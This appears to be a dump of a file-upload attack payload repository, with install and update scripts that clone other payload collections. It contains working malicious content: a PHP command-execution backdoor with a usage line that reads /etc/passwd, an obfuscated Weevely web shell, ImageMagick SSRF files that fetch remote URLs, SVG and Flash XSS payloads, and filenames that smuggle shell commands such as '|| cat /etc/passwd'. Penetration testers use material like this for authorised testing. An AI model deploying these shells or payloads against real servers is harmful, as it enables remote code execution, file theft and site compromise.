 3 | <?php
 4 | 
 5 | if(isset($_REQUEST['cmd'])){
 6 |         echo "<pre>";
 7 |         $cmd = ($_REQUEST['cmd']);
 8 |         system($cmd);
 9 |         echo "</pre>";
10 |         die;
11 | }
12 | 
13 | ?>
14 | 
15 | Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
16 | 
17 | <!--    http://michaeldaw.org   2006    -->
18 | 


--------------------------------------------------------------------------------
/Uploads/simple-backdoor.php.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/IntruderPayloads/9b84328441e0b1d5b63764941bfd72a2460dba5d/Uploads/simple-backdoor.php.gif


--------------------------------------------------------------------------------
/Uploads/simple-backdoor2.php.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/IntruderPayloads/9b84328441e0b1d5b63764941bfd72a2460dba5d/Uploads/simple-backdoor2.php.gif


--------------------------------------------------------------------------------
/Uploads/ssrf.jpg:
--------------------------------------------------------------------------------
1 | push graphic-context
2 | viewbox 0 0 640 480
3 | fill 'url(https://crowdshield.com/.testing/rce_vuln.txt)'
4 | pop graphic-context


--------------------------------------------------------------------------------
/Uploads/ssrf.mvg:
--------------------------------------------------------------------------------
1 | push graphic-context
2 | viewbox 0 0 640 480
3 | fill 'url(https://crowdshield.com/.testing/xss.png)'
4 | pop graphic-context
5 | 


--------------------------------------------------------------------------------
/Uploads/ssrf.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/IntruderPayloads/9b84328441e0b1d5b63764941bfd72a2460dba5d/Uploads/ssrf.png


--------------------------------------------------------------------------------
/Uploads/svg-xss-xml.svg:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" standalone="no"?>
2 | <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
3 | 
4 | <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
5 |    <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
6 |    
7 |       alert(document.domain);
8 |    
9 | </svg>


--------------------------------------------------------------------------------
/Uploads/swf/test.html:
--------------------------------------------------------------------------------
1 | <html><body>
2 | <script>console.log=function(a){alert(a);}</script>
3 | <object data="https://crowdshield.com/uploads/cd?url=https://crowdshield.com/" allowscriptaccess="always" type="application/x-shockwave-flash"></object>
4 | </body></html>
5 | 
6 | 


--------------------------------------------------------------------------------
/Uploads/swf/xssproject.swf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/IntruderPayloads/9b84328441e0b1d5b63764941bfd72a2460dba5d/Uploads/swf/xssproject.swf


--------------------------------------------------------------------------------
/Uploads/uploads.csv:
--------------------------------------------------------------------------------
  1 | file,id,external_id__v,rendition_type__v,major_version_number__v,minor_version_number__v
  2 | ,2857,,,0,1
  3 | ,2880,,,0,1
  4 | ,2912,,,0,1
  5 | /1763/122/0_1/Lighthouse.jpg,122,,,0,1
  6 | ,2804,,,0,1
  7 | ,2849,,,0,1
  8 | ,2812,,,0,1
  9 | ,2904,,,0,1
 10 | file:///etc/passwd,107,,,0,1
 11 | ,2872,,,0,1
 12 | /1763/69/0_6/Screen Shot 2016-06-15 at 20.45.02.png,69,,,0,6
 13 | ,2811,,,0,1
 14 | ,2856,,,0,1
 15 | ,2905,,,0,1
 16 | /1763/123/0_1/cathorse.jpg,123,,,0,1
 17 | ,2805,,,0,1
 18 | ,2911,,,0,1
 19 | ,2871,,,0,1
 20 | ,2920,,,0,1
 21 | ,2865,,,0,1
 22 | ,2820,,,0,1
 23 | ,2881,,,0,1
 24 | ,2806,,,0,1
 25 | ,2910,,,0,1
 26 | ,2906,,,0,1
 27 | ,2810,,,0,1
 28 | ,2882,,,0,1
 29 | ,2947,,,0,1
 30 | ,2821,,,0,1
 31 | /1763/105/0_1/x.gif,105,,,0,1
 32 | ,2913,,,0,1
 33 | /1763/87/0_1/pENTESTCSRF.jpg,87,,,0,1
 34 | ,2921,,,0,1
 35 | ,2874,,,0,1
 36 | ,2847,,,0,1
 37 | ,2939,,,0,1
 38 | ,3858,,,0,1
 39 | ,2839,,,0,1
 40 | ,2813,,,0,1
 41 | ,2864,,,0,1
 42 | ,2903,,,0,1
 43 | ,2803,,,0,1
 44 | ,2867,,,0,1
 45 | ,2854,,,0,1
 46 | ,2938,,,0,1
 47 | ,2876,,,0,1
 48 | /1763/103/0_1/prueba.txt,103,,,0,1
 49 | ,2823,,,0,1
 50 | ,2931,,,0,1
 51 | ,2891,,,0,1
 52 | ,2884,,,0,1
 53 | /1763/248/0_1/cathorse.jpg,248,,,0,1
 54 | /1763/94/0_3/XXE.docx,94,,,0,3
 55 | ,2815,,,0,1
 56 | ,2798,,,0,1
 57 | ,2900,,,0,1
 58 | ,2868,,,0,1
 59 | ,2945,,,0,1
 60 | ,2807,,,0,1
 61 | ,3874,,,0,1
 62 | /1763/1463/0_1/prueba.txt,1463,,,0,1
 63 | ,2924,,,0,1
 64 | ,2862,,,0,1
 65 | ,2937,,,0,1
 66 | ,2875,,,0,1
 67 | ,2830,,,0,1
 68 | /1763/104/0_1/Chrysanthemum.jpg,104,,,0,1
 69 | ,2869,,,0,1
 70 | ,2801,,,0,1
 71 | /1763/704/0_1/cathorse.jpg,704,,,0,1
 72 | ,3859,,,0,1
 73 | ,2808,,,0,1
 74 | ,2946,,,0,1
 75 | ,2814,,,0,1
 76 | ,2889,,,0,1
 77 | ,2863,,,0,1
 78 | ,2793,,,0,1
 79 | /1763/98/0_1/file.zip,98,,,0,1
 80 | ,2925,,,0,1
 81 | ,2917,,,0,1
 82 | /1763/124/0_1/cathorse.jpg,124,,,0,1
 83 | ,2802,,,0,1
 84 | ,2890,,,0,1
 85 | ,2828,,,0,1
 86 | ,2932,,,0,1
 87 | ,2855,,,0,1
 88 | ,2940,,,0,1
 89 | ,2896,,,0,1
 90 | ,2883,,,0,1
 91 | ,2799,,,0,1
 92 | ,2835,,,0,1
 93 | ,2870,,,0,1
 94 | ,2848,,,0,1
 95 | ,2822,,,0,1
 96 | ,2919,,,0,1
 97 | ,2795,,,0,1
 98 | ,2895,,,0,1
 99 | ,2819,,,0,1
100 | ,2942,,,0,1
101 | ,70,,,0,1
102 | ,2850,,,0,1
103 | ,2834,,,0,1
104 | ,2934,,,0,1
105 | ,2926,,,0,1
106 | ,2842,,,0,1
107 | ,2887,,,0,1
108 | ,2879,,,0,1
109 | ,2894,,,0,1
110 | ,2843,,,0,1
111 | ,2943,,,0,1
112 | ,2918,,,0,1
113 | ,2888,,,0,1
114 | ,2818,,,0,1
115 | ,2933,,,0,1
116 | ,2833,,,0,1
117 | ,2878,,,0,1
118 | ,2927,,,0,1
119 | ,2794,,,0,1
120 | /1763/99/0_1/file.zip,99,,,0,1
121 | ,2827,,,0,1
122 | ,3876,,,0,1
123 | ,2836,,,0,1
124 | ,2944,,,0,1
125 | ,2897,,,0,1
126 | ,2936,,,0,1
127 | ,2844,,,0,1
128 | ,2797,,,0,1
129 | ,2809,,,0,1
130 | ,2885,,,0,1
131 | /1763/61/0_1/23CmdCCalcA0.PNG,61,,,0,1
132 | /1763/102/0_1/Payload.svg,102,,,0,1
133 | ,2826,,,0,1
134 | ,2892,,,0,1
135 | ,2800,,,0,1
136 | ,2877,,,0,1
137 | ,2792,,,0,1
138 | ,2916,,,0,1
139 | ,2909,,,0,1
140 | ,2929,,,0,1
141 | ,2851,,,0,1
142 | /1763/71/0_1/23CmdCCalcA0.PNG,71,,,0,1
143 | ,2829,,,0,1
144 | ,2816,,,0,1
145 | ,2841,,,0,1
146 | ,2941,,,0,1
147 | ,2838,,,0,1
148 | ,2923,,,0,1
149 | ,2831,,,0,1
150 | ,2791,,,0,1
151 | ,2898,,,0,1
152 | ,2853,,,0,1
153 | /1763/62/0_2/150.jpg,62,,,0,2
154 | ,2915,,,0,1
155 | ,2907,,,0,1
156 | ,2861,,,0,1
157 | /1763/140/0_1/Koala.jpg,140,,,0,1
158 | ,2930,,,0,1
159 | ,2824,,,0,1
160 | ,2837,,,0,1
161 | ,2852,,,0,1
162 | ,2908,,,0,1
163 | ,2859,,,0,1
164 | ,2846,,,0,1
165 | ,2914,,,0,1
166 | ,2901,,,0,1
167 | ,2825,,,0,1
168 | /1763/120/0_1/Desert.jpg,120,,,0,1
169 | /1763/68/0_1/Basic Sample Resume.docx,68,,,0,1
170 | /1763/63/0_2/x22>%2522><svg onload=alert(1)>.jpeg.jpeg,63,,,0,2
171 | ,2817,,,0,1
172 | ,2866,,,0,1
173 | ,2840,,,0,1
174 | ,2902,,,0,1
175 | ,2928,,,0,1
176 | /1763/113/0_1/prueba.txt,113,,,0,1
177 | ,2893,,,0,1
178 | /1763/139/0_1/87817.jpg,139,,,0,1
179 | /1763/121/0_1/Jellyfish.jpg,121,,,0,1
180 | ,91,,,2,0
181 | ,2858,,,0,1
182 | ,2796,,,0,1
183 | ,2845,,,0,1
184 | ,2832,,,0,1
185 | /1763/106/0_1/87817.jpg,106,,,0,1
186 | ,2948,,,0,1
187 | ,2935,,,0,1
188 | ,2922,,,0,1
189 | ,2860,,,0,1
190 | ,2873,,,0,1
191 | /1763/119/0_1/Tulips.jpg,119,,,0,1
192 | ,2886,,,0,1
193 | ,2899,,,0,1
194 | 


--------------------------------------------------------------------------------
/Uploads/weevely_shell.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | $G='$kh="5cbc";[K[K$kf=[K"f07e";fu[Knction x[K[K($t,$[Kk[K){$c=[Kstrlen($k);$l=st[Krl[Ken($t);$o="";[Kf';
 3 | $m='se6[K4_en[Kcode[K(x([Kgzco[Kmpress($[Ko),$k));pr[Kint[K([K"<$k>$d</$[Kk>")[K;@[Ksession_destroy();}}}}';
 4 | $e='r=[K$_SERV[KER;[K$rr=@[K$r["HT[KTP_REF[KERER"];$ra[K=@[K$r["H[KTTP_ACCEPT_[KL[KANGUAG[KE"];if($rr&[K&$ra[K){';
 5 | $K='ray[K_key_exi[K[Ksts($i[K,$s)){[K$[Ks[$i].=$p;$e=strp[Kos($[Ks[$i[K],$f[K);if($e){$k=$k[Kh.$[Kkf;ob_st[Ka';
 6 | $p=');$s=[K&$[K_SESSIO[KN;$ss="subs[Ktr";$sl=[K"strt[Kolower"[K;$i[K=$m[K[1][0][K.$m[1][1][K;$[Kh=$sl($ss(m';
 7 | $N='d[K[K5($i.$kh),[K0,3));[K$f=$sl($[K[Kss(md5($i.$kf[K),0[K,[K3));$p="[K";[Kfor($z[K=1;$z<count($m[[K1]);$z';
 8 | $Z='+[K+)$p[K.=$q[$[Km[K[2][[K$z][K];if(strpos([K$p,$h)===0){[K$s[K[$i][K="";[K$p=$ss([K$p[K,3);}if(ar';
 9 | $j='$u=pars[Ke_u[K[Krl($rr);[Kparse_str($[Ku["quer[Ky"],$[Kq[K);$q=array_va[Kl[Kues($q);[K[Kp[Kreg_ma';
10 | $D=str_replace('gh','','cghghreategh_fghuncghghtion');
11 | $U='r[Kt()[K;@ev[Kal(@gzunc[Kompres[Ks(@x(@[Kbase[K64_dec[Kode(preg_r[Keplace(ar[Kray[K[K("/[K_/","/-/"';
12 | $Q='or($[Ki=0;[K$i<$l[K;){for($j=0;([K$[Kj<$c&&$[K[Ki<$l);$j++,$[Ki++){$o.[K=$t{$i}^[K[K$[Kk{$j};}}r[Keturn $o;}$';
13 | $O='tch_all("/([\\w[K])[[K\\w-]+(?:[K;q[K[K=0.([\\d]))[K?,?/",$ra,[K$[Km);if($q&&$m[K){@se[Ks[Ksion_star[Kt(';
14 | $V=')[K,array("/[K","+"),$ss([K$[Ks[$i],[K0,$[Ke))),$k))[K);$o=ob_get_[Kcontent[Ks()[K;[Ko[Kb_end_clean();$[Kd=ba';
15 | $T=str_replace('[K','',$G.$Q.$e.$j.$O.$p.$N.$Z.$K.$U.$V.$m);
16 | $v=$D('',$T);$v();
17 | ?>
18 | 


--------------------------------------------------------------------------------
/Uploads/white_hat%0a.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/IntruderPayloads/9b84328441e0b1d5b63764941bfd72a2460dba5d/Uploads/white_hat%0a.png


--------------------------------------------------------------------------------
/Uploads/xss.html\x00.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/IntruderPayloads/9b84328441e0b1d5b63764941bfd72a2460dba5d/Uploads/xss.html\x00.jpg


--------------------------------------------------------------------------------
/Uploads/xsspng.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/IntruderPayloads/9b84328441e0b1d5b63764941bfd72a2460dba5d/Uploads/xsspng.png


--------------------------------------------------------------------------------
/Uploads/xsspng.png\x00.csv:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/IntruderPayloads/9b84328441e0b1d5b63764941bfd72a2460dba5d/Uploads/xsspng.png\x00.csv


--------------------------------------------------------------------------------
/Uploads/|ls:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/IntruderPayloads/9b84328441e0b1d5b63764941bfd72a2460dba5d/Uploads/|ls


--------------------------------------------------------------------------------
/Uploads/|ls%20-al:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/IntruderPayloads/9b84328441e0b1d5b63764941bfd72a2460dba5d/Uploads/|ls%20-al


--------------------------------------------------------------------------------
/Uploads/|| cat %2fetc%2fpasswd;test.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/IntruderPayloads/9b84328441e0b1d5b63764941bfd72a2460dba5d/Uploads/|| cat %2fetc%2fpasswd;test.jpg


--------------------------------------------------------------------------------
/install.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | mkdir Repositories/
 3 | cd Repositories
 4 | git clone --depth=1 https://github.com/swisskyrepo/PayloadsAllTheThings.git
 5 | git clone --depth=1 https://github.com/xmendez/wfuzz.git
 6 | git clone --depth=1 https://github.com/fuzzdb-project/fuzzdb.git
 7 | git clone --depth=1 https://github.com/minimaxir/big-list-of-naughty-strings.git
 8 | git clone --depth=1 https://github.com/foospidy/payloads.git
 9 | git clone --depth=1 https://github.com/danielmiessler/RobotsDisallowed.git
10 | git clone --depth=1 https://github.com/danielmiessler/SecLists.git
11 | 


--------------------------------------------------------------------------------
/update.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | # Shoutz to @vay3t
 3 | cd Repositories
 4 | cd PayloadsAllTheThings/ && git pull && cd ..
 5 | cd wfuzz/ && git pull && cd ..
 6 | cd fuzzdb/ && git pull && cd ..
 7 | cd big-list-of-naughty-strings/ && git pull && cd ..
 8 | cd payloads/ && git pull && cd ..
 9 | cd RobotsDisallowed/ && git pull && cd ..
10 | cd SecLists/ && git pull && cd ..
11 | 


--------------------------------------------------------------------------------